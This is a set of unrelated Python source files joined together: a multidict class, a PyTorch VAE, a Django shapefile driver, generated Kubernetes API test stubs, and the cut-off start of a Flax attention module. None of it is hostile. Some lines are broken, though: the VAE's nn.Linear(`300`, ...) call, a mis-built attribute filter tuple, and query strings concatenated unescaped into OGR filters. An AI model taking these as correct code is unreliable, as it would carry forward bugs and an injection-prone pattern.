"""Return a new view of the dictionary's values."""
return _ValuesView(self._items)
def __eq__(self, other):
if not isinstance(other, (_Base, dict)):
return NotImplemented
if isinstance(other, _Base):
return sorted(self._items) == sorted(other._items)
for k, v in self.items():
nv = other.get(k if not self.isCI else k.upper(), _marker)
if v != nv:
return False
return True
def __contains__(self, key):
for k, v in self._items:
if k == key:
return True
return False
def __repr__(self):
body = ', '.join("'{}': {!r}".format(k, v) for k, v in self.items())
return '<{}({})>'.format(self.__class__.__name__, body)
class _CIBase(_Base):
isCI = True
def getall(self, key, default=_marker):
"""Return a list of all values matching the key."""
return super(_CIBase, self).getall(key.upper(), default)
def getone(self, key, default=_marker):
"""Get first value matching the key."""
return super(_CIBase, self).getone(key.upper(), default)
def get(self, key, default=None):
"""Get first value matching the key.
The method is alias for .getone().
"""
return super(_CIBase, self).get(key.upper(), default)
def __getitem__(self, key):
return super(_CIBase, self).__getitem__(key.upper())
def __contains__(self, key):
return super(_CIBase, self).__contains__(key.upper())
class MultiDictProxy(_Base):
def __init__(self, arg):
if not isinstance(arg, MultiDict):
raise TypeError(
'MultiDictProxy requires MultiDict instance, not {}'.format(
type(arg)))
self._items = arg._items
def copy(self):
"""Return a copy of itself."""
return MultiDict(self.items())
class CIMultiDictProxy(_CIBase, MultiDictProxy):
def __init__(self, arg):
if not isinstance(arg, CIMultiDict):
raise TypeError(
'CIMultiDictProxy requires CIMultiDict instance, not {}'
.format(type(arg)))
self._items = arg._items
def copy(self):
"""Return a copy of itself."""
return CIMultiDict(self.items())
class MultiDict(_Base):
def __init__(self, *args, **kwargs):
self._items = []
self._extend(args, kwargs, self.__class__.__name__, self.add)
def add(self, key, value):
"""Add the key and value, not overwriting any previous value."""
self._items.append((key, value))
def copy(self):
"""Return a copy of itself."""
cls = self.__class__
return cls(self.items())
def extend(self, *args, **kwargs):
"""Extend current MultiDict with more values.
This method must be used instead of update.
"""
self._extend(args, kwargs, 'extend', self.add)
def _extend(self, args, kwargs, name, method):
if len(args) > 1:
raise TypeError("{} takes at most 1 positional argument"
" ({} given)".format(name, len(args)))
if args:
arg = args[0]
if isinstance(args[0], MultiDictProxy):
items = arg._items
elif isinstance(args[0], MultiDict):
items = arg._items
elif hasattr(arg, 'items'):
items = arg.items()
else:
for item in arg:
if not len(item) == 2:
raise TypeError(
"{} takes either dict or list of (key, value) "
"tuples".format(name))
items = arg
for key, value in items:
method(key, value)
for key, value in kwargs.items():
method(key, value)
def clear(self):
"""Remove all items from MultiDict."""
self._items = []
# Mapping interface #
def __setitem__(self, key, value):
self._replace(key, value)
def __delitem__(self, key):
items = self._items
found = False
for i in range(len(items) - 1, -1, -1):
if items[i][0] == key:
del items[i]
found = True
if not found:
raise KeyError(key)
def setdefault(self, key, default=None):
"""Return value for key, set value to default if key is not present."""
for k, v in self._items:
if k == key:
return v
self._items.append((key, default))
return default
def pop(self, key, default=_marker):
"""Remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise
KeyError is raised.
"""
value = None
found = False
for i in range(len(self._items) - 1, -1, -1):
if self._items[i][0] == key:
value = self._items[i][1]
del self._items[i]
found = True
if not found:
if default is _marker:
raise KeyError(key)
else:
return default
else:
return value
def popitem(self):
"""Remove and return an arbitrary (key, value) pair."""
if self._items:
return self._items.pop(0)
else:
raise KeyError("empty multidict")
def update(self, *args, **kwargs):
"""Update the dictionary from *other*, overwriting existing keys."""
self._extend(args, kwargs, 'update', self._replace)
def _replace(self, key, value):
if key in self:
del self[key]
self.add(key, value)
class CIMultiDict(_CIBase, MultiDict):
def add(self, key, value):
"""Add the key and value, not overwriting any previous value."""
super(CIMultiDict, self).add(key.upper(), value)
def __setitem__(self, key, value):
super(CIMultiDict, self).__setitem__(key.upper(), value)
def __delitem__(self, key):
super(CIMultiDict, self).__delitem__(key.upper())
def _replace(self, key, value):
super(CIMultiDict, self)._replace(key.upper(), value)
def setdefault(self, key, default=None):
"""Return value for key, set value to default if key is not present."""
key = key.upper()
return super(CIMultiDict, self).setdefault(key, default)
class _ViewBase(object):
def __init__(self, items):
self._items = items
def __len__(self):
return len(self._items)
class _ItemsView(_ViewBase):
def __contains__(self, item):
assert isinstance(item, tuple) or isinstance(item, list)
assert len(item) == 2
return item in self._items
def __iter__(self):
for item in self._items:
yield item
def __repr__(self):
lst = []
for item in self._items:
lst.append("{!r}: {!r}".format(item[0], item[1]))
body = ', '.join(lst)
return '{}({})'.format(self.__class__.__name__, body)
class _ValuesView(_ViewBase):
def __contains__(self, value):
for item in self._items:
if item[1] == value:
return True
return False
def __iter__(self):
for item in self._items:
yield item[1]
def __repr__(self):
lst = []
for item in self._items:
lst.append("{!r}".format(item[1]))
body = ', '.join(lst)
return '{}({})'.format(self.__class__.__name__, body)
def __eq__(self, other):
if not isinstance(other, (_ValuesView, set)):
return NotImplemented
_values = [i[1] for i in self._items]
if isinstance(other, _ValuesView):
other = set([o[1] for o in other._items])
return set(_values) == other
class _KeysView(_ViewBase):
def __init__(self, items, isCI=False):
super(_KeysView, self).__init__(items)
self.isCI = isCI
def __contains__(self, key):
for item in self._items:
if item[0] == key:
return True
return False
def __iter__(self):
for item in self._items:
yield item[0]
def __repr__(self):
lst = []
for item in self._items:
lst.append("{!r}".format(item[0]))
body = ', '.join(lst)
return '{}({})'.format(self.__class__.__name__, body)
@property
def __keys(self):
return set([i[0] for i in self._items])
def __check_other(self, other):
if not isinstance(other, (_KeysView, set)):
return NotImplemented
if isinstance(other, _KeysView):
other = [o[0] for o in other._items]
if self.isCI:
other = [o if not isinstance(o, str) else o.upper()
for o in other]
return set(other)
def isdisjoint(self, other):
return self.__keys.isdisjoint(self.__check_other(other))
def __eq__(self, other):
return self.__keys == self.__check_other(other)
def __and__(self, other):
return self.__keys & self.__check_other(other)
def __or__(self, other):
return self.__keys | self.__check_other(other)
def __sub__(self, other):
return self.__keys - self.__check_other(other)
def __xor__(self, other):
return self.__keys ^ self.__check_other(other)
| |
from __future__ import print_function
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
from utils.distributions import log_Bernoulli, log_Normal_diag, log_Normal_standard
from utils.visual_evaluation import plot_histogram
import numpy as np
import math
from scipy.misc import logsumexp
def xavier_init(m):
s = np.sqrt( 2. / (m.in_features + m.out_features) )
m.weight.data.normal_(0, s)
class Gate(nn.Module):
def __init__(self):
super(Gate, self).__init__()
def forward(self, h, g):
return h * g
#=======================================================================================================================
class VAE(nn.Module):
def __init__(self, args):
super(VAE, self).__init__()
self.args = args
# Model: p(x|z)
# decoder: p(x | z)
self.p_x_layers_pre = nn.ModuleList()
self.p_x_layers_gate = nn.ModuleList()
self.p_x_layers_pre.append(nn.Linear(self.args.z1_size, 300))
self.p_x_layers_gate.append(nn.Linear(self.args.z1_size, 300))
self.p_x_layers_pre.append(nn.Linear(300, 300))
self.p_x_layers_gate.append(nn.Linear(300, 300))
self.p_x_mean = nn.Linear(300, int(np.prod(self.args.input_size))) # 784
# prior: p(z) = 1/K sum_k N(mean_k, var_k)
# mixture of Gaussians parameters
self.means = nn.Linear(self.args.number_components, int(np.prod(self.args.input_size)), bias=False)
# implementation trick: initialize means and logvars as layers and take input to be identity matrix: I*W = W
self.idle_input = Variable(torch.eye(self.args.number_components, self.args.number_components))
if self.args.cuda:
self.idle_input = self.idle_input.cuda()
# Variational: q(z|x)
# encoder: q(z | x)
self.q_z_layers_pre = nn.ModuleList()
self.q_z_layers_gate = nn.ModuleList()
self.q_z_layers_pre.append(nn.Linear(int(np.prod(self.args.input_size)), 300))
self.q_z_layers_gate.append(nn.Linear(int(np.prod(self.args.input_size)), 300))
self.q_z_layers_pre.append(nn.Linear(300, 300))
self.q_z_layers_gate.append(nn.Linear(300, 300))
self.q_z_mean = nn.Linear(`300`, self.args.z1_size)
self.q_z_logvar = nn.Linear(300, self.args.z1_size)
self.sigmoid = nn.Sigmoid()
self.Gate = Gate()
# Xavier initialization (normal)
for m in self.modules():
if isinstance(m, nn.Linear):
xavier_init(m)
# AUXILIARY METHODS
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
if self.args.cuda:
eps = torch.cuda.FloatTensor(std.size()).normal_()
else:
eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu)
def calculate_likelihood(self, X, dir, mode='test', S=5000):
# set auxiliary variables for number of training and test sets
N_test = X.size(0)
# init list
likelihood_test = []
MB = 100
if S <= MB:
R = 1
else:
R = S / MB
S = MB
for j in range(N_test):
if j % 100 == 0:
print('{:.2f}%'.format(j / (1. * N_test) * 100))
# Take x*
x_single = X[j].unsqueeze(0)
a = []
for r in range(0, R):
# Repeat it for all training points
x = x_single.expand(S, x_single.size(1))
x_mean, x_logvar, z_q, z_q_mean, z_q_logvar = self.forward(x)
# RE
RE = log_Bernoulli(x, x_mean, dim=1)
# KL
log_p_z = self.log_p_z(z_q)
log_q_z = log_Normal_diag(z_q, z_q_mean, z_q_logvar, dim=1)
KL = -(log_p_z - log_q_z)
a_tmp = (RE - KL)
a.append( a_tmp.cpu().data.numpy() )
# calculate max
a = np.asarray(a)
a = np.reshape(a, (a.shape[0] * a.shape[1], 1))
likelihood_x = logsumexp( a )
likelihood_test.append(likelihood_x - np.log(S))
likelihood_test = np.array(likelihood_test)
plot_histogram(-likelihood_test, dir, mode)
return -np.mean(likelihood_test)
def calculate_lower_bound(self, X_full):
# CALCULATE LOWER BOUND:
lower_bound = 0.
RE_all = 0.
KL_all = 0.
MB = 100
for i in range(X_full.size(0) / MB):
x = X_full[i * MB: (i + 1) * MB].view(-1, np.prod(self.args.input_size))
# pass through VAE
x_mean, x_logvar, z_q, z_q_mean, z_q_logvar = self.forward(x)
# Reconstruction error RE
RE = log_Bernoulli(x, x_mean)
# KL Divergence
log_p_z = self.log_p_z(z_q)
log_q_z = log_Normal_diag(z_q, z_q_mean, z_q_logvar, dim=1)
KL = -torch.sum(log_p_z - log_q_z)
RE_all += RE.cpu().data[0]
KL_all += KL.cpu().data[0]
# CALCULATE LOWER-BOUND: RE + KL - ln(N)
lower_bound += (-RE + KL).cpu().data[0]
lower_bound = lower_bound / X_full.size(0)
return lower_bound
# THE MODEL: VARIATIONAL POSTERIOR
def q_z(self, x):
h0_pre = self.q_z_layers_pre[0](x)
h0_gate = self.sigmoid(self.q_z_layers_gate[0](x))
h0 = self.Gate(h0_pre, h0_gate)
h1_pre = self.q_z_layers_pre[1](h0)
h1_gate = self.sigmoid(self.q_z_layers_gate[1](h0))
h1 = self.Gate(h1_pre, h1_gate)
z_q_mean = self.q_z_mean(h1)
z_q_logvar = self.q_z_logvar(h1)
return z_q_mean, z_q_logvar
# THE MODEL: GENERATIVE DISTRIBUTION
def p_x(self, z):
h0_pre = self.p_x_layers_pre[0](z)
h0_gate = self.sigmoid(self.p_x_layers_gate[0](z))
h0 = self.Gate(h0_pre, h0_gate)
h1_pre = self.p_x_layers_pre[1](h0)
h1_gate = self.sigmoid(self.p_x_layers_gate[1](h0))
h1 = self.Gate(h1_pre, h1_gate)
x_mean = self.sigmoid(self.p_x_mean(h1))
x_logvar = 0.
return x_mean, x_logvar
def log_p_z(self, z ):
# z - MB x M
MB = z.size(0)
C = self.args.number_components
M = z.size(1)
# calculate params ( U in paper )
X = self.means(self.idle_input)
# calculate params for given data
z_p_mean, z_p_logvar = self.q_z(X) #C x M
# expand z
z_expand = z.unsqueeze(1).expand(MB, C, M)
means = z_p_mean.unsqueeze(0).expand(MB, C, M)
logvars = z_p_logvar.unsqueeze(0).expand(MB, C, M)
a = log_Normal_diag( z_expand, means, logvars, dim=2 ).squeeze(2) - math.log(C) # MB x C
a_max, _ = torch.max(a, 1) # MB x 1
# calculte log-sum-exp
log_p_z = a_max + torch.log(torch.sum(torch.exp(a - a_max.expand(MB, C)), 1)) # MB x 1
return log_p_z
# THE MODEL: FORWARD PASS
def forward(self, x):
# z ~ q(z | x)
z_q_mean, z_q_logvar = self.q_z(x)
z_q = self.reparameterize(z_q_mean, z_q_logvar)
# x_mean = p(x|z)
x_mean, x_logvar = self.p_x(z_q)
return x_mean, x_logvar, z_q, z_q_mean, z_q_logvar
| |
# from ga_ows.views import wms, wfs
import shutil
import json
from zipfile import ZipFile
import pandas
from django.contrib.gis.geos import Polygon
import os
import sh
from osgeo import osr, ogr
from . import Driver
from pandas import DataFrame
from shapely import wkb
from django.template.defaultfilters import slugify
import re
def ogrfield(elt):
return re.sub('-', '_', slugify(elt).encode('ascii'))[0:10]
def identity(x):
return '"' + x + '"' if isinstance(x, basestring) else str(x)
dtypes = {
'int64': ogr.OFTInteger,
'float64': ogr.OFTReal,
'object': ogr.OFTString,
'datetime64[ns]': ogr.OFTDateTime
}
geomTypes = {
'GeometryCollection': ogr.wkbGeometryCollection,
'LinearRing': ogr.wkbLinearRing,
'LineString': ogr.wkbLineString,
'MultiLineString': ogr.wkbMultiLineString,
'MultiPoint': ogr.wkbMultiPoint,
'MultiPolygon': ogr.wkbMultiPolygon,
'Point': ogr.wkbPoint,
'Polygon': ogr.wkbPolygon
}
def transform(geom, crx):
if crx:
geom.Transform(crx)
return geom
class ShapefileDriver(Driver):
@classmethod
def supports_multiple_layers(cls):
return False
@classmethod
def supports_configuration(cls):
return False
def ready_data_resource(self, **kwargs):
"""Other keyword args get passed in as a matter of course, like BBOX, time, and elevation, but this basic driver
ignores them"""
slug, srs = super(ShapefileDriver, self).ready_data_resource(**kwargs)
return slug, srs, {
'type': 'shape',
"file": self.cached_basename + '.shp'
}
def clear_cached_files(self):
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.shp')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.shx')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.dbf')))
sh.rm('-f', sh.glob(os.path.join(self.cache_path, '*.prj')))
def compute_spatial_metadata(self, **kwargs):
"""Other keyword args get passed in as a matter of course, like BBOX, time, and elevation, but this basic driver
ignores them"""
super(ShapefileDriver, self).compute_spatial_metadata(**kwargs)
self.clear_cached_files()
archive = ZipFile(self.cached_basename + self.src_ext)
projection_found = False
for name in archive.namelist():
xtn = name.split('.')[-1].lower()
if xtn in {'shp', 'shx', 'dbf', 'prj'} and "__MACOSX" not in name:
projection_found = projection_found or xtn == 'prj'
with open(self.cached_basename + '.' + xtn, 'wb') as fout:
with archive.open(name) as fin:
chunk = fin.read(65536)
while chunk:
fout.write(chunk)
chunk = fin.read(65536)
if not projection_found:
with open(self.cached_basename + '.prj', 'w') as f:
srs = osr.SpatialReference()
srs.ImportFromEPSG(4326)
f.write(srs.ExportToWkt())
ds = ogr.Open(self.cached_basename + '.shp')
lyr = ds.GetLayerByIndex(0) if 'sublayer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
xmin, xmax, ymin, ymax = lyr.GetExtent()
crs = lyr.GetSpatialRef()
self.resource.spatial_metadata.native_srs = crs.ExportToProj4()
e4326 = osr.SpatialReference()
e4326.ImportFromEPSG(4326)
crx = osr.CoordinateTransformation(crs, e4326)
x04326, y04326, _ = crx.TransformPoint(xmin, ymin)
x14326, y14326, _ = crx.TransformPoint(xmax, ymax)
self.resource.spatial_metadata.bounding_box = Polygon.from_bbox((x04326, y04326, x14326, y14326))
self.resource.spatial_metadata.native_bounding_box = Polygon.from_bbox((xmin, ymin, xmax, ymax))
self.resource.spatial_metadata.three_d = False
self.resource.spatial_metadata.save()
self.resource.save()
def get_data_fields(self, **kwargs):
_, _, result = self.ready_data_resource(**kwargs)
ds = ogr.Open(result['file'])
lyr = ds.GetLayerByIndex(0) if 'layer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
return [(field.name, field.GetTypeName(), field.width) for field in lyr.schema]
def get_data_for_point(self, wherex, wherey, srs, **kwargs):
result, x1, y1, epsilon = super(ShapefileDriver, self).get_data_for_point(wherex, wherey, srs, **kwargs)
ds = ogr.Open(result['file'])
lyr = ds.GetLayerByIndex(0) if 'sublayer' not in kwargs else ds.GetLayerByName(kwargs['sublayer'])
if epsilon==0:
lyr.SetSpatialFilter(ogr.CreateGeometryFromWkt("POINT({x1} {y1})".format(**locals())))
else:
from django.contrib.gis import geos
wkt = geos.Point(x1,y1).buffer(epsilon).wkt
print wkt
lyr.SetSpatialFilter(ogr.CreateGeometryFromWkt(wkt))
return [f.items() for f in lyr]
def attrquery(self, key, value):
key, op = key.split('__')
op = {
'gt' : ">",
'gte' : ">=",
'lt' : "<",
'lte' : '<=',
'startswith' : 'LIKE',
'endswith' : 'LIKE',
'istartswith' : 'ILIKE',
'iendswith' : 'ILIKE',
'icontains' : "ILIKE",
'contains' : "LIKE",
'in' : 'IN',
'ne' : "<>"
}[op]
value = {
'gt': identity,
'gte': identity,
'lt': identity,
'lte': identity,
'startswith': lambda x : '%' + x,
'endswith': lambda x : x + '%',
'istartswith': lambda x : '%' + x,
'iendswith': lambda x : x + '%',
'icontains': lambda x : '%' + x + '%',
'contains': lambda x: '%' + x + '%',
'in': lambda x: x if isinstance(x, basestring) else '(' + ','.join(identity(a) for a in x) + ')',
'ne': identity
}[op](value)
return ' '.join([key, op, value])
def as_dataframe(self, **kwargs):
"""
Creates a dataframe object for a shapefile's main layer using layer_as_dataframe. This object is cached on disk for
layer use, but the cached copy will only be picked up if the shapefile's mtime is older than the dataframe's mtime.
:param shp: The shapefile
:return:
"""
dfx_path = self.get_filename('dfx')
shp_path = self.get_filename('shp')
if len(kwargs) != 0:
ds = ogr.Open(shp_path)
lyr = ds.GetLayerByIndex(0)
crx=xrc=None
if 'bbox' in kwargs:
minx,miny,maxx,maxy = kwargs['bbox']
if 'srs' in kwargs:
if isinstance(kwargs['srs'], basestring):
s_srs = osr.SpatialReference()
if kwargs['srs'].lower().startswith('epsg:'):
s_srs.ImportFromEPSG(int(kwargs['srs'].split(':')[1]))
else:
s_srs.ImportFromProj4(kwargs['srs'])
else:
s_srs = kwargs['srs']
t_srs = self.resource.srs
if s_srs.ExportToProj4() != t_srs.ExportToProj4():
crx = osr.CoordinateTransformation(s_srs, t_srs)
minx, miny, _ = crx.TransformPoint(minx, miny)
maxx, maxy, _ = crx.TransformPoint(maxx, maxy)
xrc = osr.CoordinateTransformation(t_srs, s_srs)
lyr.SetSpatialFilterRect(minx, miny, maxx, maxy)
elif 'boundary' in kwargs:
boundary = ogr.Geometry(geomTypes[kwargs['boundary_type']], kwargs["boundary"])
lyr.SetSpatialFilter(boundary)
if 'query' in kwargs:
if isinstance(kwargs['query'], basestring):
query = json.loads(kwargs['query'])
else:
query = kwargs['query']
for key, value in query.items():
attrq= self.attrquery(key, value) if '__' in key else key, '='
lyr.SetAttributeFilter(attrq)
start = kwargs['start'] if 'start' in kwargs else 0
count = kwargs['count'] if 'count' in kwargs else len(lyr) - start
records = []
for i in range(start):
lyr.next()
for i in range(count):
f = lyr.next()
if f.geometry():
records.append(dict(fid=i, geometry=wkb.loads(transform(f.geometry(), xrc).ExportToWkb()), **f.items()))
df = DataFrame.from_records(
data=records,
index='fid'
)
if 'sort_by' in kwargs:
df = df.sort_index(by=kwargs['sort_by'])
return df
elif hasattr(self, '_df'):
return self._df
elif os.path.exists(dfx_path) and os.stat(dfx_path).st_mtime >= os.stat(shp_path).st_mtime:
if self.resource.big:
self._df = pandas.read_hdf(dfx_path, 'df')
else:
self._df = pandas.read_pickle(dfx_path)
return self._df
else:
ds = ogr.Open(shp_path)
lyr = ds.GetLayerByIndex(0)
df= DataFrame.from_records(
data=[dict(fid=f.GetFID(), geometry=wkb.loads(f.geometry().ExportToWkb()), **f.items()) for f in lyr if f.geometry()],
index='fid'
)
if self.resource.big:
df.to_hdf(dfx_path, 'df')
else:
df.to_pickle(dfx_path)
self._df = df
return self._df
@classmethod
def from_dataframe(cls, df, shp, srs):
"""Write an dataframe object out as a shapefile"""
drv = ogr.GetDriverByName('ESRI Shapefile')
if os.path.exists(shp):
shutil.rmtree(shp)
os.mkdir(shp)
ds = drv.CreateDataSource(shp)
keys = df.keys()
fieldDefns = [ogr.FieldDefn(ogrfield(name), dtypes[df[name].dtype.name]) for name in keys if name != 'geometry']
geomType = geomTypes[(f for f in df['geometry']).next().type]
l = ds.CreateLayer(
name=os.path.split(shp)[-1],
srs=srs,
geom_type=geomType
)
for f in fieldDefns:
l.CreateField(f)
for i, record in df.iterrows():
feature = ogr.Feature(l.GetLayerDefn())
for field, value in ((k, v) for k, v in record.to_dict().items() if k != 'geometry'):
if isinstance(value, basestring):
value=value.encode('ascii')
feature.SetField(ogrfield(field), value)
feature.SetGeometry(ogr.CreateGeometryFromWkb(record['geometry'].wkb))
l.CreateFeature(feature)
del ds
driver = ShapefileDriver
| |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.extensions_v1beta1_api import ExtensionsV1beta1Api
class TestExtensionsV1beta1Api(unittest.TestCase):
""" ExtensionsV1beta1Api unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.extensions_v1beta1_api.ExtensionsV1beta1Api()
def tearDown(self):
pass
def test_create_namespaced_daemon_set(self):
"""
Test case for create_namespaced_daemon_set
"""
pass
def test_create_namespaced_deployment(self):
"""
Test case for create_namespaced_deployment
"""
pass
def test_create_namespaced_deployment_rollback_rollback(self):
"""
Test case for create_namespaced_deployment_rollback_rollback
"""
pass
def test_create_namespaced_ingress(self):
"""
Test case for create_namespaced_ingress
"""
pass
def test_create_namespaced_network_policy(self):
"""
Test case for create_namespaced_network_policy
"""
pass
def test_create_namespaced_replica_set(self):
"""
Test case for create_namespaced_replica_set
"""
pass
def test_create_pod_security_policy(self):
"""
Test case for create_pod_security_policy
"""
pass
def test_create_third_party_resource(self):
"""
Test case for create_third_party_resource
"""
pass
def test_delete_collection_namespaced_daemon_set(self):
"""
Test case for delete_collection_namespaced_daemon_set
"""
pass
def test_delete_collection_namespaced_deployment(self):
"""
Test case for delete_collection_namespaced_deployment
"""
pass
def test_delete_collection_namespaced_ingress(self):
"""
Test case for delete_collection_namespaced_ingress
"""
pass
def test_delete_collection_namespaced_network_policy(self):
"""
Test case for delete_collection_namespaced_network_policy
"""
pass
def test_delete_collection_namespaced_replica_set(self):
"""
Test case for delete_collection_namespaced_replica_set
"""
pass
def test_delete_collection_pod_security_policy(self):
"""
Test case for delete_collection_pod_security_policy
"""
pass
def test_delete_collection_third_party_resource(self):
"""
Test case for delete_collection_third_party_resource
"""
pass
def test_delete_namespaced_daemon_set(self):
"""
Test case for delete_namespaced_daemon_set
"""
pass
def test_delete_namespaced_deployment(self):
"""
Test case for delete_namespaced_deployment
"""
pass
def test_delete_namespaced_ingress(self):
"""
Test case for delete_namespaced_ingress
"""
pass
def test_delete_namespaced_network_policy(self):
"""
Test case for delete_namespaced_network_policy
"""
pass
def test_delete_namespaced_replica_set(self):
"""
Test case for delete_namespaced_replica_set
"""
pass
def test_delete_pod_security_policy(self):
"""
Test case for delete_pod_security_policy
"""
pass
def test_delete_third_party_resource(self):
"""
Test case for delete_third_party_resource
"""
pass
def test_get_api_resources(self):
"""
Test case for get_api_resources
"""
pass
def test_list_daemon_set_for_all_namespaces(self):
"""
Test case for list_daemon_set_for_all_namespaces
"""
pass
def test_list_deployment_for_all_namespaces(self):
"""
Test case for list_deployment_for_all_namespaces
"""
pass
def test_list_ingress_for_all_namespaces(self):
"""
Test case for list_ingress_for_all_namespaces
"""
pass
def test_list_namespaced_daemon_set(self):
"""
Test case for list_namespaced_daemon_set
"""
pass
def test_list_namespaced_deployment(self):
"""
Test case for list_namespaced_deployment
"""
pass
def test_list_namespaced_ingress(self):
"""
Test case for list_namespaced_ingress
"""
pass
def test_list_namespaced_network_policy(self):
"""
Test case for list_namespaced_network_policy
"""
pass
def test_list_namespaced_replica_set(self):
"""
Test case for list_namespaced_replica_set
"""
pass
def test_list_network_policy_for_all_namespaces(self):
"""
Test case for list_network_policy_for_all_namespaces
"""
pass
def test_list_pod_security_policy(self):
"""
Test case for list_pod_security_policy
"""
pass
def test_list_replica_set_for_all_namespaces(self):
"""
Test case for list_replica_set_for_all_namespaces
"""
pass
def test_list_third_party_resource(self):
"""
Test case for list_third_party_resource
"""
pass
def test_patch_namespaced_daemon_set(self):
"""
Test case for patch_namespaced_daemon_set
"""
pass
def test_patch_namespaced_daemon_set_status(self):
"""
Test case for patch_namespaced_daemon_set_status
"""
pass
def test_patch_namespaced_deployment(self):
"""
Test case for patch_namespaced_deployment
"""
pass
def test_patch_namespaced_deployment_status(self):
"""
Test case for patch_namespaced_deployment_status
"""
pass
def test_patch_namespaced_deployments_scale(self):
"""
Test case for patch_namespaced_deployments_scale
"""
pass
def test_patch_namespaced_ingress(self):
"""
Test case for patch_namespaced_ingress
"""
pass
def test_patch_namespaced_ingress_status(self):
"""
Test case for patch_namespaced_ingress_status
"""
pass
def test_patch_namespaced_network_policy(self):
"""
Test case for patch_namespaced_network_policy
"""
pass
def test_patch_namespaced_replica_set(self):
"""
Test case for patch_namespaced_replica_set
"""
pass
def test_patch_namespaced_replica_set_status(self):
"""
Test case for patch_namespaced_replica_set_status
"""
pass
def test_patch_namespaced_replicasets_scale(self):
"""
Test case for patch_namespaced_replicasets_scale
"""
pass
def test_patch_namespaced_replicationcontrollers_scale(self):
"""
Test case for patch_namespaced_replicationcontrollers_scale
"""
pass
def test_patch_pod_security_policy(self):
"""
Test case for patch_pod_security_policy
"""
pass
def test_patch_third_party_resource(self):
"""
Test case for patch_third_party_resource
"""
pass
def test_read_namespaced_daemon_set(self):
"""
Test case for read_namespaced_daemon_set
"""
pass
def test_read_namespaced_daemon_set_status(self):
"""
Test case for read_namespaced_daemon_set_status
"""
pass
def test_read_namespaced_deployment(self):
"""
Test case for read_namespaced_deployment
"""
pass
def test_read_namespaced_deployment_status(self):
"""
Test case for read_namespaced_deployment_status
"""
pass
def test_read_namespaced_deployments_scale(self):
"""
Test case for read_namespaced_deployments_scale
"""
pass
def test_read_namespaced_ingress(self):
"""
Test case for read_namespaced_ingress
"""
pass
def test_read_namespaced_ingress_status(self):
"""
Test case for read_namespaced_ingress_status
"""
pass
def test_read_namespaced_network_policy(self):
"""
Test case for read_namespaced_network_policy
"""
pass
def test_read_namespaced_replica_set(self):
"""
Test case for read_namespaced_replica_set
"""
pass
def test_read_namespaced_replica_set_status(self):
"""
Test case for read_namespaced_replica_set_status
"""
pass
def test_read_namespaced_replicasets_scale(self):
"""
Test case for read_namespaced_replicasets_scale
"""
pass
def test_read_namespaced_replicationcontrollers_scale(self):
"""
Test case for read_namespaced_replicationcontrollers_scale
"""
pass
def test_read_pod_security_policy(self):
"""
Test case for read_pod_security_policy
"""
pass
def test_read_third_party_resource(self):
"""
Test case for read_third_party_resource
"""
pass
def test_replace_namespaced_daemon_set(self):
"""
Test case for replace_namespaced_daemon_set
"""
pass
def test_replace_namespaced_daemon_set_status(self):
"""
Test case for replace_namespaced_daemon_set_status
"""
pass
def test_replace_namespaced_deployment(self):
"""
Test case for replace_namespaced_deployment
"""
pass
def test_replace_namespaced_deployment_status(self):
"""
Test case for replace_namespaced_deployment_status
"""
pass
def test_replace_namespaced_deployments_scale(self):
"""
Test case for replace_namespaced_deployments_scale
"""
pass
def test_replace_namespaced_ingress(self):
"""
Test case for replace_namespaced_ingress
"""
pass
def test_replace_namespaced_ingress_status(self):
"""
Test case for replace_namespaced_ingress_status
"""
pass
def test_replace_namespaced_network_policy(self):
"""
Test case for replace_namespaced_network_policy
"""
pass
def test_replace_namespaced_replica_set(self):
"""
Test case for replace_namespaced_replica_set
"""
pass
def test_replace_namespaced_replica_set_status(self):
"""
Test case for replace_namespaced_replica_set_status
"""
pass
def test_replace_namespaced_replicasets_scale(self):
"""
Test case for replace_namespaced_replicasets_scale
"""
pass
def test_replace_namespaced_replicationcontrollers_scale(self):
"""
Test case for replace_namespaced_replicationcontrollers_scale
"""
pass
def test_replace_pod_security_policy(self):
"""
Test case for replace_pod_security_policy
"""
pass
def test_replace_third_party_resource(self):
"""
Test case for replace_third_party_resource
"""
pass
if __name__ == '__main__':
unittest.main()
| |
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core Fast Attention Module for Flax.
This is a fork of:
https://github.com/google-research/google-research/blob/master/performer/fast_attention/jax/fast_attention.py
"""
# pylint: disable=invalid-name, missing-function-docstring, line-too-long
import abc
from collections.abc import Iterable # pylint: disable=g-importing-member
import functools
from absl import logging
import gin
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
import numpy as onp
# Nonlinear mappings encoding different attention kernels.
gin.external_configurable(jnp.cos, 'jcos')
gin.external_configurable(jnp.sin, 'jsin')
gin.external_configurable(jnp.tanh, 'jtanh')
gin.external_configurable(jax.nn.sigmoid, 'jsigmoid')
gin.external_configurable(
lambda x: jax.nn.gelu(x, approximate=False), 'jgelu'
) # Needs to be exact, although might be slower. See https://github.com/google/jax/issues/4428.
gin.external_configurable(lambda x: x * x * (x > 0.0), 'jrequ')
gin.external_configurable(jnp.exp, 'jexp')
gin.external_configurable(lambda x: x, 'jidentity')
gin.external_configurable(
lambda x: (jnp.exp(x)) * (x <= 0.0) + (x + 1.0) * (x > 0.0), 'jshiftedelu'
